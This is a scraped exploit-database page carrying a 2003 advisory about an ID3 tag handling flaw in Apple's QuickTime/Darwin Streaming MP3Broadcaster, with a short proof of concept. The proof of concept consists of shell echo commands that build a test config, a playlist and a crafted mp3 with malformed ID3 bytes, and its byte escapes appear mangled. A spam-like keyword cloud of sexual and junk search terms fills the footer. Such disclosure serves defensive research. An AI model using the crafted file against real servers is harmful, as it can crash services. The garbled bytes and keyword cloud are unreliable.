about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Apple QuickTime/Darwin Streaming MP3Broadcaster ID3 Tag Handling Vulnerability


Title Apple QuickTime/Darwin Streaming MP3Broadcaster ID3 Tag Handling Vulnerability
Published 2003-05-22-12:00AM
Updated 2003-12-23-06:29PM
Class Boundary Condition Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability has been credited to Sir Mordred <mordred@s-mail.com>.
Vulnerable  Apple Quicktime MP3 Broadcaster
Not Vulnerable  
Code   The following proof of concept has been provided by Sir Mordred <mordred@s-mail.com>:

First create the sample configuration file:
$ echo -e " " > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST* song.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3x03x00x00x00x00x0fx0fTPE1xffxaaxaaxbbx00x00x00x00x00x00

" > song.mp3
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 05:33:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sxsxxx98 bulletin b Www+thesex Windows Pl sxsy Www.blackg bala_balaj www.sexgir www.trish site scrip shop581314 gbook search/exp maxcpm.inf www.51ip.c www.sexfor Exim smtpd flickr www.little pinkworldv www.newhol Nokia 6233 who gadis mela Abyss GOA GIRL S Sania mirz PHP 4 apac Www.celebr Leah dizon CANADASEX Sexy ph Subdreamer www.fzrjob SEXCARTOON free sax news for c Subdreamer Www.world ANIMAL VID www.lennk. Invision P linux teln Google dog www.fzrjob PNphpBB2_S news for c www.nudema Jenifa.lop m...Fid.tx